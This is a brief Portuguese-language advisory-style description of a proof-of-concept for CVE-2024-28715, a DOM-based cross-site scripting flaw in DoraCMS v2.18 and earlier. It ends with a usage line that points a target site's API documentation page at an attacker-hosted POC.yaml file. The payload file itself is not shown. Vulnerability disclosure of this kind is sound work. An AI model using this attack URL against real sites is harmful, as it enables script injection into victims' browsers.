
Exploit de prova de conceito para CVE-2024-28715, uma vulnerabilidade de XSS baseada em DOM no DoraCMS v2.18 e anteriores, acionada via função markdown0 no endpoint de documentação da API.
[ID CVE]
CVE-2024-28715
[PRODUTO]
DoraCMS
[Versão]
DoraCMS v2.18 e anteriores
[TIPO DE PROBLEMA]
XSS baseado em DOM.
[DESCRIÇÃO]
Vulnerabilidade de Cross Site Scripting no DoraCMS v.2.18 e anteriores permite que um atacante remoto execute código arbitrário por meio da função markdown0 no endpoint /app/public/apidoc/oas3/wrap-components/markdown.jsx.
[Uso]
https://[site-alvo]/static/apidoc/index.html?url=https://[seu-site]/POC.yaml